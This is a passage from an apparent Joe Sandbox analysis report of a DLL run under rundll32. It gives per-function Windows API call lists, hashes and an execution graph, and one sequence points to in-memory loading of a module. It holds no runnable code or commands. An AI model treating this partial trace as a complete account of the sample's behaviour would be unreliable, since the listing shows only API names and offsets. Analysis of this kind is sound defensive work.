                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                          • String ID: %s%s.dll
                                                                                                          • API String ID: 1311856149-1649984862
                                                                                                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                                                                                                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                                                                                                          • __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003787B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                                                                                                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002AB0, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002B47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 4100373531-0
                                                                                                          • Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
                                                                                                          • Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253506028-0
                                                                                                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                                                                                                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
                                                                                                          • TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969253408-0
                                                                                                          • Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
                                                                                                          • Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Analysis Process: rundll32.exe PID: 1320 Parent PID: 6260 rundll32.exeCOMMON

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:507
                                                                                                          Total number of Limit Nodes:20

                                                                                                          Graph

                                                                                                          execution_graph 21113 100036a0 21116 1002e654 21113->21116 21117 1002e707 21116->21117 21127 1002e666 21116->21127 21141 1003654f 7 API calls __decode_pointer 21117->21141 21119 1002e70d 21142 10030d24 67 API calls __getptd_noexit 21119->21142 21124 1002e6c3 RtlAllocateHeap 21124->21127 21125 1002e677 21125->21127 21134 10036507 67 API calls 2 library calls 21125->21134 21135 1003635c 67 API calls 7 library calls 21125->21135 21136 100306e0 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 21125->21136 21127->21124 21127->21125 21128 1002e6f3 21127->21128 21131 1002e6f8 21127->21131 21133 100036c0 21127->21133 21137 1002e605 67 API calls 4 library calls 21127->21137 21138 1003654f 7 API calls __decode_pointer 21127->21138 21139 10030d24 67 API calls __getptd_noexit 21128->21139 21140 10030d24 67 API calls __getptd_noexit 21131->21140 21134->21125 21135->21125 21137->21127 21138->21127 21139->21131 21140->21133 21141->21119 21142->21133 21143 10003440 21144 1000344f 21143->21144 21146 10003454 21143->21146 21149 100033f0 67 API calls _malloc 21144->21149 21147 1002e654 _malloc 67 API calls 21146->21147 21148 10003464 21146->21148 21147->21148 21149->21146 21150 10003160 21153 10002d40 21150->21153 21188 100024a0 21153->21188 21156 10002d83 SetLastError 21180 10002d69 21156->21180 21157 10002d95 21158 100024a0 SetLastError 21157->21158 21159 10002dae 21158->21159 21160 10002dd0 SetLastError 21159->21160 21161 10002de2 21159->21161 21159->21180 21160->21180 21162 10002df1 SetLastError 21161->21162 21163 10002e03 21161->21163 21162->21180 21164 10002e0e SetLastError 21163->21164 21168 10002e20 GetNativeSystemInfo 21163->21168 21164->21180 21166 10002ed4 SetLastError 21166->21180 21167 10002ee6 VirtualAlloc 21169 10002f32 GetProcessHeap HeapAlloc 21167->21169 21170 10002f07 VirtualAlloc 21167->21170 21168->21166 21168->21167 21172 10002f6c 21169->21172 21173 10002f4c VirtualFree SetLastError 21169->21173 21170->21169 21171 10002f23 SetLastError 21170->21171 21171->21180 21174 100024a0 SetLastError 21172->21174 21173->21180 21175 10002fce 21174->21175 21176 10002fdc VirtualAlloc 21175->21176 21186 10002fd2 21175->21186 21177 1000300b 21176->21177 21191 100024d0 21177->21191 21181 1000303f 21181->21186 21201 10002ab0 21181->21201 21185 100030a8 21185->21186 21187 1000310f SetLastError 21185->21187 21186->21180 21220 10003310 VirtualFree VirtualFree GetProcessHeap HeapFree 21186->21220 21187->21186 21189 100024bb 21188->21189 21190 100024af SetLastError 21188->21190 21189->21156 21189->21157 21189->21180 21190->21189 21192 10002500 21191->21192 21193 10002593 21192->21193 21194 1000253c VirtualAlloc 21192->21194 21200 100025b0 21192->21200 21195 100024a0 SetLastError 21193->21195 21196 10002560 21194->21196 21199 10002567 21194->21199 21197 100025ac 21195->21197 21196->21200 21198 100025b4 VirtualAlloc 21197->21198 21197->21200 21198->21200 21199->21192 21200->21181 21202 10002ae9 IsBadReadPtr 21201->21202 21211 10002adf 21201->21211 21204 10002b13 21202->21204 21202->21211 21205 10002b45 SetLastError 21204->21205 21206 10002b59 21204->21206 21204->21211 21205->21211 21221 100023c0 VirtualQuery VirtualFree VirtualAlloc 21206->21221 21208 10002b73 21209 10002b7f SetLastError 21208->21209 21212 10002ba9 21208->21212 21209->21211 21211->21186 21214 100027c0 21211->21214 21212->21211 21213 10002cb9 SetLastError 21212->21213 21213->21211 21215 10002808 21214->21215 21216 10002911 21215->21216 21218 100028ed 21215->21218 21222 10002690 21215->21222 21217 10002690 2 API calls 21216->21217 21217->21218 21218->21185 21220->21180 21221->21208 21223 100026ac 21222->21223 21228 100026a2 21222->21228 21225 10002714 VirtualProtect 21223->21225 21226 100026ba 21223->21226 21225->21228 21227 100026f2 VirtualFree 21226->21227 21226->21228 21227->21228 21228->21215 21229 1001df20 21232 10003190 21229->21232 21233 100031bd SetLastError 21232->21233 21234 100031cc 21232->21234 21242 100032eb 21233->21242 21235 100031e9 SetLastError 21234->21235 21236 100031f8 21234->21236 21235->21242 21237 1000320a 21236->21237 21240 10003247 21236->21240 21238 1000322d 21237->21238 21239 1000321e SetLastError 21237->21239 21238->21242 21243 100032df SetLastError 21238->21243 21239->21242 21240->21238 21241 100032c8 SetLastError 21240->21241 21241->21242 21243->21242 21244 10024d50 21249 1002b0bb 21244->21249 21246 10024d82 21248 10024d5f 21248->21246 21260 1002acfb 21248->21260 21252 1002b0c7 __EH_prolog3 21249->21252 21251 1002b115 21287 1002ac8f EnterCriticalSection 21251->21287 21252->21251 21268 1002aec4 TlsAlloc 21252->21268 21272 1002adac EnterCriticalSection 21252->21272 21294 10023b5b 78 API calls 3 library calls 21252->21294 21257 1002b13b std::locale::_Locimp::~_Locimp 21257->21248 21258 1002b128 21295 1002af6b 88 API calls 4 library calls 21258->21295 21261 1002ad07 __EH_prolog3_catch 21260->21261 21262 1002ad30 std::locale::_Locimp::~_Locimp 21261->21262 21303 1002a6ab 21261->21303 21262->21248 21264 1002ad16 21265 1002ad23 21264->21265 21313 10024d0b 21264->21313 21316 1002a71d 79 API calls ~_Task_impl 21265->21316 21269 1002aef0 21268->21269 21270 1002aef5 InitializeCriticalSection 21268->21270 21296 10023b23 78 API calls 3 library calls 21269->21296 21270->21252 21277 1002adcf 21272->21277 21273 1002ae8e _memset 21274 1002aea5 LeaveCriticalSection 21273->21274 21274->21252 21275 1002ae08 21297 10023778 21275->21297 21276 1002ae1d GlobalHandle GlobalUnlock 21279 10023778 ctype 80 API calls 21276->21279 21277->21273 21277->21275 21277->21276 21281 1002ae3b GlobalReAlloc 21279->21281 21282 1002ae47 21281->21282 21283 1002ae6e GlobalLock 21282->21283 21284 1002ae52 GlobalHandle GlobalLock 21282->21284 21285 1002ae60 LeaveCriticalSection 21282->21285 21283->21273 21284->21285 21301 10023b23 78 API calls 3 library calls 21285->21301 21288 1002acd1 LeaveCriticalSection 21287->21288 21289 1002acaa 21287->21289 21291 1002acda 21288->21291 21289->21288 21290 1002acaf TlsGetValue 21289->21290 21290->21288 21292 1002acbb 21290->21292 21291->21257 21291->21258 21292->21288 21293 1002acc0 LeaveCriticalSection 21292->21293 21293->21291 21294->21252 21295->21257 21296->21270 21298 1002378d ctype 21297->21298 21299 1002379a GlobalAlloc 21298->21299 21302 10001650 80 API calls ctype 21298->21302 21299->21282 21301->21283 21302->21299 21304 1002a6c0 21303->21304 21305 1002a6bb 21303->21305 21307 1002a6ce 21304->21307 21318 1002a687 InitializeCriticalSection 21304->21318 21317 10023b5b 78 API calls 3 library calls 21305->21317 21309 1002a6e0 EnterCriticalSection 21307->21309 21310 1002a70a EnterCriticalSection 21307->21310 21311 1002a6ff LeaveCriticalSection 21309->21311 21312 1002a6ec InitializeCriticalSection 21309->21312 21310->21264 21311->21310 21312->21311 21319 10024bd0 21313->21319 21315 10024d17 21315->21265 21316->21262 21317->21304 21318->21307 21320 10024bdc __EH_prolog3_catch 21319->21320 21339 1001e8f0 21320->21339 21326 10024c76 21348 1002ac5c 79 API calls ctype 21326->21348 21328 10024c85 21329 10024c97 21328->21329 21349 100248e2 117 API calls 2 library calls 21328->21349 21350 1002ac5c 79 API calls ctype 21329->21350 21332 10024caa 21333 10024cbc 21332->21333 21351 10024b06 117 API calls 2 library calls 21332->21351 21352 1002ac5c 79 API calls ctype 21333->21352 21336 10024cd0 21338 10024ce2 std::locale::_Locimp::~_Locimp 21336->21338 21353 10024b89 117 API calls 2 library calls 21336->21353 21338->21315 21340 1001e8fe 21339->21340 21342 1001e921 21340->21342 21354 10001650 80 API calls ctype 21340->21354 21343 1001ed40 21342->21343 21344 1001ed82 21343->21344 21345 1001ed76 21343->21345 21347 10020421 67 API calls _malloc 21344->21347 21355 1001f370 21345->21355 21347->21326 21348->21328 21349->21329 21350->21332 21351->21333 21352->21336 21353->21338 21354->21340 21356 1001f38f 21355->21356 21357 1001f3ab 21356->21357 21360 1001f3b9 21356->21360 21362 1001fb60 21357->21362 21359 1001f3b7 21359->21344 21360->21359 21370 1001fc30 80 API calls 21360->21370 21363 1001fb8e 21362->21363 21371 100236ce 21363->21371 21366 1001fbb1 21376 1002e804 68 API calls 3 library calls 21366->21376 21368 1001fbeb 21368->21359 21370->21359 21372 100236e2 21371->21372 21373 1001fba3 21371->21373 21374 1002e654 _malloc 67 API calls 21372->21374 21373->21366 21375 1001fb50 80 API calls ctype 21373->21375 21374->21373 21375->21366 21376->21368 21377 100346f7 GetLastError 21391 1003459f TlsGetValue 21377->21391 21380 10034764 SetLastError 21385 10034743 21414 10034610 67 API calls 5 library calls 21385->21414 21386 1003475b 21415 1002e577 21386->21415 21389 1003474b GetCurrentThreadId 21389->21380 21390 10034761 21390->21380 21392 100345b4 21391->21392 21393 100345cf 21391->21393 21394 10034524 __decode_pointer 7 API calls 21392->21394 21393->21380 21396 100351f3 21393->21396 21395 100345bf TlsSetValue 21394->21395 21395->21393 21398 100351fc 21396->21398 21399 10034722 21398->21399 21400 1003521a Sleep 21398->21400 21428 1003b872 21398->21428 21399->21380 21402 10034524 TlsGetValue 21399->21402 21401 1003522f 21400->21401 21401->21398 21401->21399 21403 1003455d GetModuleHandleW 21402->21403 21404 1003453c 21402->21404 21405 10034578 GetProcAddress 21403->21405 21406 1003456d 21403->21406 21404->21403 21407 10034546 TlsGetValue 21404->21407 21409 10034555 21405->21409 21455 1003065c Sleep GetModuleHandleW 21406->21455 21413 10034551 21407->21413 21411 10034590 21409->21411 21412 10034588 RtlDecodePointer 21409->21412 21410 10034573 21410->21405 21410->21411 21411->21385 21411->21386 21412->21411 21413->21403 21413->21409 21414->21389 21416 1002e583 _fputc 21415->21416 21417 1002e5c2 21416->21417 21418 1002e5fc _fputc __expand 21416->21418 21420 10035865 __lock 65 API calls 21416->21420 21417->21418 21419 1002e5d7 RtlFreeHeap 21417->21419 21418->21390 21419->21418 21421 1002e5e9 21419->21421 21422 1002e59a ___sbh_find_block 21420->21422 21458 10030d24 67 API calls __getptd_noexit 21421->21458 21425 1002e5b4 21422->21425 21456 100358c8 VirtualFree VirtualFree HeapFree ___BuildCatchObjectHelper 21422->21456 21424 1002e5ee GetLastError 21424->21418 21457 1002e5cd LeaveCriticalSection _doexit 21425->21457 21429 1003b87e _fputc 21428->21429 21430 1003b896 21429->21430 21433 1003b8b5 _memset 21429->21433 21441 10030d24 67 API calls __getptd_noexit 21430->21441 21432 1003b89b 21442 10032de1 7 API calls 2 library calls 21432->21442 21435 1003b927 RtlAllocateHeap 21433->21435 21438 1003b8ab _fputc 21433->21438 21443 10035865 21433->21443 21450 10036077 5 API calls 2 library calls 21433->21450 21451 1003b96e LeaveCriticalSection _doexit 21433->21451 21452 1003654f 7 API calls __decode_pointer 21433->21452 21435->21433 21438->21398 21441->21432 21444 1003587a 21443->21444 21445 1003588d EnterCriticalSection 21443->21445 21453 100357a2 67 API calls 8 library calls 21444->21453 21445->21433 21447 10035880 21447->21445 21454 1003068c 67 API calls 3 library calls 21447->21454 21449 1003588c 21449->21445 21450->21433 21451->21433 21452->21433 21453->21447 21454->21449 21455->21410 21456->21425 21457->21417 21458->21424 21459 1002eaac 21460 1002eab7 21459->21460 21461 1002eabc 21459->21461 21477 1003732f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21460->21477 21465 1002e9b6 21461->21465 21464 1002eaca 21467 1002e9c2 _fputc 21465->21467 21466 1002ea0f 21475 1002ea5f _fputc 21466->21475 21525 10008080 21466->21525 21467->21466 21467->21475 21478 1002e881 21467->21478 21470 1002ea22 21471 1002ea3f 21470->21471 21472 10008080 ___DllMainCRTStartup 71 API calls 21470->21472 21473 1002e881 __CRT_INIT@12 157 API calls 21471->21473 21471->21475 21474 1002ea36 21472->21474 21473->21475 21476 1002e881 __CRT_INIT@12 157 API calls 21474->21476 21475->21464 21476->21471 21477->21461 21479 1002e890 21478->21479 21480 1002e90c 21478->21480 21530 10035645 HeapCreate 21479->21530 21482 1002e943 21480->21482 21487 1002e912 21480->21487 21483 1002e948 21482->21483 21484 1002e9a1 21482->21484 21485 1003459f ___set_flsgetvalue 9 API calls 21483->21485 21493 1002e89b 21484->21493 21652 100348b9 79 API calls 2 library calls 21484->21652 21490 1002e94d 21485->21490 21488 1002e92d 21487->21488 21487->21493 21642 10030912 21487->21642 21488->21493 21648 10036caa 68 API calls __output_l 21488->21648 21494 100351f3 __calloc_crt 67 API calls 21490->21494 21493->21466 21497 1002e959 21494->21497 21495 1002e8a7 __RTC_Initialize 21498 1002e8ab 21495->21498 21504 1002e8b7 GetCommandLineA 21495->21504 21497->21493 21502 10034524 __decode_pointer 7 API calls 21497->21502 21645 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21498->21645 21499 1002e937 21649 100345d3 70 API calls 2 library calls 21499->21649 21505 1002e977 21502->21505 21503 1002e93c 21650 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21503->21650 21566 1003702b 21504->21566 21511 1002e995 21505->21511 21512 1002e97e 21505->21512 21510 1002e8d1 21513 1002e8d5 21510->21513 21608 10036f70 21510->21608 21515 1002e577 __output_l 67 API calls 21511->21515 21651 10034610 67 API calls 5 library calls 21512->21651 21646 100345d3 70 API calls 2 library calls 21513->21646 21515->21493 21518 1002e985 GetCurrentThreadId 21518->21493 21520 1002e8f5 21520->21493 21647 10036caa 68 API calls __output_l 21520->21647 21757 1001ffa0 21525->21757 21531 1002e896 21530->21531 21531->21493 21532 10034927 GetModuleHandleW 21531->21532 21533 10034942 21532->21533 21534 1003493b 21532->21534 21536 10034aaa 21533->21536 21537 1003494c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21533->21537 21653 1003065c Sleep GetModuleHandleW 21534->21653 21667 100345d3 70 API calls 2 library calls 21536->21667 21538 10034995 TlsAlloc 21537->21538 21542 10034aaf 21538->21542 21543 100349e3 TlsSetValue 21538->21543 21540 10034941 21540->21533 21542->21495 21543->21542 21544 100349f4 21543->21544 21654 10030921 6 API calls 4 library calls 21544->21654 21546 100349f9 21655 100344a9 TlsGetValue 21546->21655 21549 100344a9 __encode_pointer 6 API calls 21550 10034a14 21549->21550 21551 100344a9 __encode_pointer 6 API calls 21550->21551 21552 10034a24 21551->21552 21553 100344a9 __encode_pointer 6 API calls 21552->21553 21554 10034a34 21553->21554 21665 100356e9 InitializeCriticalSectionAndSpinCount __ioinit 21554->21665 21556 10034a41 21556->21536 21557 10034524 __decode_pointer 7 API calls 21556->21557 21558 10034a55 21557->21558 21558->21536 21559 100351f3 __calloc_crt 67 API calls 21558->21559 21560 10034a6e 21559->21560 21560->21536 21561 10034524 __decode_pointer 7 API calls 21560->21561 21562 10034a88 21561->21562 21562->21536 21563 10034a8f 21562->21563 21666 10034610 67 API calls 5 library calls 21563->21666 21565 10034a97 GetCurrentThreadId 21565->21542 21567 10037049 GetEnvironmentStringsW 21566->21567 21571 10037068 21566->21571 21568 10037051 21567->21568 21569 1003705d GetLastError 21567->21569 21573 10037093 WideCharToMultiByte 21568->21573 21574 10037084 GetEnvironmentStringsW 21568->21574 21569->21571 21570 10037101 21572 1003710a GetEnvironmentStrings 21570->21572 21575 1002e8c7 21570->21575 21571->21568 21571->21570 21572->21575 21576 1003711a 21572->21576 21579 100370c7 21573->21579 21580 100370f6 FreeEnvironmentStringsW 21573->21580 21574->21573 21574->21575 21593 10036a56 21575->21593 21670 100351ae 67 API calls _malloc 21576->21670 21669 100351ae 67 API calls _malloc 21579->21669 21580->21575 21583 10037134 21586 10037147 21583->21586 21587 1003713b FreeEnvironmentStringsA 21583->21587 21584 100370cd 21584->21580 21585 100370d5 WideCharToMultiByte 21584->21585 21588 100370e7 21585->21588 21592 100370ef 21585->21592 21671 1002db20 __VEC_memcpy 21586->21671 21587->21575 21590 1002e577 __output_l 67 API calls 21588->21590 21590->21592 21591 10037151 FreeEnvironmentStringsA 21591->21575 21592->21580 21672 10030e38 21593->21672 21595 10036a62 GetStartupInfoA 21596 100351f3 __calloc_crt 67 API calls 21595->21596 21603 10036a83 21596->21603 21597 10036ca1 _fputc 21597->21510 21598 10036c1e GetStdHandle 21602 10036be8 21598->21602 21599 10036c83 SetHandleCount 21599->21597 21600 100351f3 __calloc_crt 67 API calls 21600->21603 21601 10036c30 GetFileType 21601->21602 21602->21597 21602->21598 21602->21599 21602->21601 21674 100386ab InitializeCriticalSectionAndSpinCount _fputc 21602->21674 21603->21597 21603->21600 21603->21602 21605 10036b6b 21603->21605 21604 10036b94 GetFileType 21604->21605 21605->21597 21605->21602 21605->21604 21673 100386ab InitializeCriticalSectionAndSpinCount _fputc 21605->21673 21609 10036f85 21608->21609 21610 10036f8a GetModuleFileNameA 21608->21610 21681 100334dc 111 API calls __setmbcp 21609->21681 21611 10036fb1 21610->21611 21675 10036dd6 21611->21675 21615 1002e8e1 21615->21520 21621 10036cf8 21615->21621 21616 10036fed 21682 100351ae 67 API calls _malloc 21616->21682 21618 10036ff3 21618->21615 21619 10036dd6 _parse_cmdline 77 API calls 21618->21619 21620 1003700d 21619->21620 21620->21615 21622 10036d01 21621->21622 21625 10036d06 _strlen 21621->21625 21684 100334dc 111 API calls __setmbcp 21622->21684 21623 1002e8ea 21623->21520 21636 1003074b 21623->21636 21625->21623 21626 100351f3 __calloc_crt 67 API calls 21625->21626 21630 10036d3b _strlen 21626->21630 21627 10036d99 21628 1002e577 __output_l 67 API calls 21627->21628 21628->21623 21629 100351f3 __calloc_crt 67 API calls 21629->21630 21630->21623 21630->21627 21630->21629 21631 10036dbf 21630->21631 21634 10036d80 21630->21634 21685 1003096f 67 API calls __output_l 21630->21685 21632 